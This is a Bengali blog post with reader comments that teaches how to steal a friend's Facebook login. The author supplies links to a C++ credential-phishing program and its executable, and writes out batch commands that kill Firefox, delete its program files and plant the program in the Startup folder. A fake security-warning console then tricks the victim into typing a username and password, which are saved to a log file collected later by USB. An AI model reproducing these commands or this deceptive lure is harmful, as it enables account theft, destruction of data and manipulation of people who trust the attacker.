জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!

26
3149

হ্যাকিং শিখতে খুব আগ্রহী এমন মানুষের কোন অভাব নেই। বিশেষ করে, কারো যদি FaceBook একাউন্ট হ্যাক করতে পারতেন, তাহলে হয়ত আপনার জীবন সার্থক হত। কিন্তু আমরা সকলেই জানি, হ্যাকিং কোন সহজ বিষয় নয়। শিখতে অনেক কষ্ট হয়।

 

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

আমি কোন এক্সপার্ট হ্যাকার না হলেও আজ আপনাদের একটা হ্যাকিং শিখাব। আশা করি শিরোনাম দেখেই আপনি বুঝতে পারছেন আমি কিসের হ্যাকিং এর কথা বলছি। আমি যে পদ্ধতি বলব, তা খুবই সহজ। এমনকি শ্রেষ্ঠ এন্টিভাইরাস ও আমার এই কারসাজি ধরতে পারবে না। তবে শর্ত একটাই, আপনার ভিকটিমের কম্পিউটারে আপনার এক্সেস থাকতে হবে। আপনার বন্ধু কি তার কম্পিউটারে আপনাকে হাত দিতে দিবে না, তা হয় নাকি? অনেকেই তো আছেন বন্ধুর কম্পিউটারে ঘন্টার পর ঘন্টা বসে থাকেন।

 

এখন চলে আসি  মূল কথায়। আমি C++ দিয়ে স্বহস্তে একটি প্রোগ্রাম বানিয়েছি যা মানুষকে বোকা বানাতে সক্ষম, হ্যাঁ, নিজে তৈরি করেছি। আবার বলিয়েন না যে অন্য জায়গা থেকে কপি-পেস্ট মারছি। এমন উলটাপালটা বুদ্ধি আমার মাথা ছাড়া কারো মাথায় আসে না। C++ জানা থাকলে ভাল। তবে সমস্যা নেই, কারন আমি কোডটা + ফাইলটা দিয়ে দিব। যেটা খুশি ব্যবহার করিয়েন।

 

যেভাবে কাজ করবেঃ

 

আগে বলে রাখি, জিনিসটা খুবই সিম্পল। আপনার বন্ধু যখন কম্পিউটার রান করবে, তখন প্রথমে একটা মেসেজ দেখাবে “Serious Error Occured”. তারপর একটা কনসোল দেখাবে, যেখানে লেখা থাকবে – “FireFox has crashed on the last start for one or more reason. Some scripts may fail to protect your login credentials from 3rd Parties. To help protect your login id, please verify again. The following verification codes are valunerable: FaceBook.

Please re-verify your FaceBook account. This is for your own safety.”

এরপর Username এবং Pass চাওয়া হবে। আপনার বন্ধু যদি এই কনসোলের কথা বিশ্বাস করে, তাহলেই কেল্লা ফতে। সে লেখার সময় একেবারে Login Pass লেখার মত অনুভব করবে। সে রকম কারসাজিই আমি করেছি।

আর তারপর, তারপর কি???????

তারপর তার UserName এবং Pass একটা ফাইলে সেভ হয়ে যাবে। আপনার কাজ হচ্ছে পরের দিন এসে ফাইলটি নিয়ে নেয়া। মজার না? :)

নিচে কনসোলটি স্ক্রিনশট:

 

জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!

 

যেভাবে করবেনঃ

এজন্য C++ লাগবে। তবে না জানলে সমস্যা নেই, কারন আমি ফাইলটি দিয়ে দেব। কোডটি চলুন দেখে নিই: http://codetidy.com/2300

 

ফাইলটি ডাউনলোড করতেঃ http://www.mediafire.com/?0y734mbykpixa97

 

এখন জেনে নিই কীভাবে কাজটি করবেন।

প্রথমে একটা ব্যাচ ফাইল বানান, যেখানে নিম্নলিখিত কোডগুলো লিখবেন:

taskkill /f /im firefox.exe

erase /f /q “C:\Program Files\Mozilla FireFox\*.*”

copy “crash.exe” “C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”

exit

 

আপনার কাজ শেষ। এবার এই ব্যাচ ফাইল .bat এবং crash.exe ফাইলটি আপনার পেনড্রাইভে নিয়ে বন্ধুর কম্পিউটারে যান। এবার সুযোগ বুঝে ব্যাচ ফাইলটি রান করুন। এর ফলে crash.exe আপনার বন্ধুর কম্পিউটারের Startup এ চলে যাবে। পরবর্তীত কম্পিউটার রান করলেই সে কনসোল দেখতে পাবে। সে যখন ফায়ারফক্স রান করবে, তখন ফায়ারফক্স কাজ করবে না। এর ফলে সে ভাববে সত্যিই কিছু হয়েছে এবং সে পাস ও লগিন আইডি দিয়ে দিবে।

এই পাস ও লগিন আইডি C:\Log.txt নামক ফাইলে সেভ হবে। আপনার কাজ হবে পরেরদিন এসে সুযোগ বুঝে Log.txt ফাইলটি নিয়ে নেয়া। জিনিসটা সহজ করতে একটা ব্যাচ ফাইল তৈরি করতে পারেনঃ

copy “C:\Log.txt” “J:\”

erase /f /q “C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\crash.exe”

 

উপরের কোডে J:\ এর জায়গায় আপনার পেনড্রাইভ ড্রাইভার লেটার বসিয়ে দিন। বিশেষ করে আপনার বন্ধুর কম্পিউটারে পেনড্রাইভ ঢুকালে কোন ড্রাইভার লেটার শো করে তা বসাবেন। চলুন দেখে নিই Log.txt ফাইলটি।

জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!

 

দেখলেন তো, উক্ত ফাইলে এভাবেই আপনার বন্ধুর login id সেভ হয়ে থাকবে।

 

কেমন লাগল? বুদ্ধিটা একটু উলটা হলেও ভাল। তবে হ্যাঁ, সিকিউরিটিতে এক্সপার্ট এমন কারো কাছে এই কাজ করার চেষ্টা কইরেন না, তাহলে ধরা খাবেন। আর হ্যাঁ, ব্যাচ কমান্ড গুলো কিন্তু শুধু Windows 7 এর ক্ষেত্রে প্রযোজ্য। XP হলে Directory একটু ভিন্ন, প্রয়োজন অনুযায়ী চেঞ্জ করে নিবেন।

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

26 মন্তব্য

    • হ্যাকিং এ খাজনার চেয়ে বেশি বাজনা লাগতেই পারে (আমার পোস্টকে আমি সরাসরি হ্যাকিং পোস্ট হিসেবে উল্লেখ করব না)। যেমন ধরুন, হ্যাকিং গ্রুপ Anonymous এর কথা। তারা একটি ওয়েবসাইট ৩-৪ মিনিট ধরে রাখতে সক্ষম হলেই কত ক্ষতি করে ফেলে।
      কাজেই, আপনার ফেসবুক একাউন্টের গুরুত্ব না থাকলেও অনেক মানুষেরই অনেক গুরুত্বপূর্ণ তথ্য ফেসবুকে থাকে। সেক্ষেত্রে বাজনা বেশি করতে একজন এক্সপার্ট হ্যাকারের আপত্তি নেই। হ্যাকিং হাতের মোয়া নয় যে সামান্য খাজনা দিয়ে হাজারগুনে বাজনা পাবেন।

  1. যারা শুধু মোবাইল দিয়ে ব্যবহার করে তাদের কিভাবে ?

  2. হ্যাকিং জিনিসটা বরাবরের মত আমার কাছে জটটটিল লাগে ।উহ!

  3. আমি যদি আমার শত্রুর ফেসবুক হ্যাক করতে চাই তাহলে তো আপনার পদ্ধতি অবলম্বন করতে হলে আগে তাকে বন্ধু বানাতে হবে এরপর তার পিসি তে আক্সেস নিতে হবে তার পর যদি কিছু একটা হয় :(

    এই পদ্ধতির ভেতরে “জটিল” কিছুই দেখলাম না যেমন টা আপনি বলেছেন আপনার শিরোনামে :) আমি আমার মতামত টা স্পষ্টই প্রকাশ করলাম :) দয়া করে আহত হবেন না ;)

    • বেশি কিছু কমু না, তবে আপনার একটা বদ স্বভাব ধরায় দিমু। কিছু মনে কইরেন না,

      আমি খেয়াল করলুম, হ্যাকিং সম্পর্কিত কোন পোস্ট হইলে আপনি উহার সূক্ষাতিসূক্ষ্ম খুত ধরার চেষ্টা করেন, যাহা নিরর্থক। শুধুমাত্র আপনার হ্যাকিং পোস্টগুলোই যে ভুল-ভ্রান্তি হীন হইবে তাহার কোন নিশ্চয়তা নাই। পাশাপাশি, আপনি আমার এই পোস্টের মর্মার্থ বুঝেন নাই। আমি এখানে পরিচিত মানুষকে কিভাবে “বোকা” বানাবেন তাহা দেখাইছি, – শত্রু নয়। বিষয়টা বিবেচনায় রাখিবেন। :)

      • আমি কাউকে এই রকম কথা লিখি না কিন্তু লিখতে বাধ্য হলাম :)

        ১) হ্যাকিং খুবই সুক্ষ একটা আর্ট :) কোন ভুলভ্রান্তি থাকলে নিজেরই লস :)

        ২) আপনি সব কিছু শুদ্ধ ভাবে জানবেন তা ঠিক না :) সুতরাং শেখার মানসিকতা কে লালন করুন । আখেরে আপনারই লাভ :)

        ৩) আমি আপনাকে ছোট করার জন্য মন্তব্য টা করি নাই :) আপনার ভুল টা ধরিয়েছি এই জন্যই যাতে আপনি আরও নিখুঁত হয়ে উঠেন :)

        ৪) মতামতের শেষে লিখেছিলাম দয়া করে আহত হবেন না ;) আমি আপনার ক্রেডিট ছিনিয়ে নিচ্ছিলাম না সাহায্য করছিলাম :) আর অপাত্রে দান করব না :)

        ** ভুল ধরতে হলেই বলতাম ATTITUDE চেঞ্জ করুন ;) আর বানানের দিকে খেয়াল রাখুন** =]] =]]

    • (এমন জায়গায় কমেন্ট করলেন যে রিপ্লাই দিতে পারলাম না…)
      আপনার কথা সবই বুঝলাম। কিন্তু আপনি তো হ্যাকিং সমন্ধে ভালই জানেন, আপনিই বলুন তো এটাকে কি আপনার ব্যাসিক বা Advanced Hacking মনে হয়? এটি একটা বোকা বানানোর ট্রিকস। হ্যাকিং এর সাথে পরোক্ষ সম্পর্ক আছে বলেই হ্যাকিং সেকশনে আমি এটা প্রকাশ করেছি। আপনি এও জানেন, কারো Antivirus Disable করে হ্যাকিং, Keylog দিয়ে হ্যাকিং মূলত কোন হ্যাকিং নয়, কারন এতে সার্থকতা থাকে না (অন্তত আমার তা মনে হয়)।

      কাজেই এখানে ভুল ধরার কোন প্রয়োজন নেই, শুধরানোরও দরকার নেই। এটি তাদেরই জন্য যারা ব্যাসিক হ্যাকিং ও পারে না। আর আমি ভাল করেই জানি কোনটা ভুল আর কোনটা ঠিক। আর আপনি বানান ভুলের কথা লিখেছেন, মূলত সে সময় অভ্র তে সমস্যা হচ্ছিল দেখেই আমি ভুল বানান লিখতে বাধ্য হয়েছি।

  4. দারুন হয়েছে। এরকম আরো কিছূ টিউন চাই। সত্যিই অসাধারণ।

  5. টিউনারপেজ ! আপনারা মন্তব্য করার জন্য বলেন । কি মন্তব্য করব ?

    • আমি তো মন্তব্য করতে বলি নাই। আপনার যা মনে হয় আপনি সেটাই লিখবেন। টিউনটা কি এতই খারাপ যে মন্তব্য করারও অযোগ্য। ঠিকাছে যান, এর পরে ১০-১২ টা Phising Page বানিয়ে দিব। তাহলে খুশি?

  6. ফেস বুকের এমন কিছু দুর্বল সেবা ব্যাবস্থা আছে যার দরুন সেই দুর্বলতার সুযোগ নিয়ে ফেস বুক আইডি হ্যাক করা যায় , কিন্তু তার জন্য ভিক টিম এর লগইন ইমেইল আইডি টি জানা থাকলেই হয় , সুতরাং আপনার এই আইডিয়া তা তেমন ভাল লাগলো না , কিন্তু আপনি এমন কিছু একটা করে দেখিয়েছেন যা অনেক মূল্যবান । ধন্যবাদ ।

    • সবার কি সব কিছু ভাল লাগে? তবে আইডিয়াটা যে খুব ভাল নয় সেটা আমিও জানতাম। কিন্তু শেয়ার করলাম, বলা যায় না। হয়ত আপনিই আমার একটু উন্নত ফাদে পড়ে লগিন আইডি হারাইতেন। কাজেই, Think Positively. এই পোস্টের কিছু উপকারিতাও আছে।

      • এরকম করে চিন্তা করলে সবকিছুই হয়। আর খালি কি বন্ধুদের ক্ষেত্রেই এটা প্রয়োগ করবেন?

        (BDCA এর কাছে অনুরোধ, আপনারা কি একটু Advanced Hacking শিখাবেন? চির কৃতজ্ঞ থাকিব :) )

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

five + seventeen =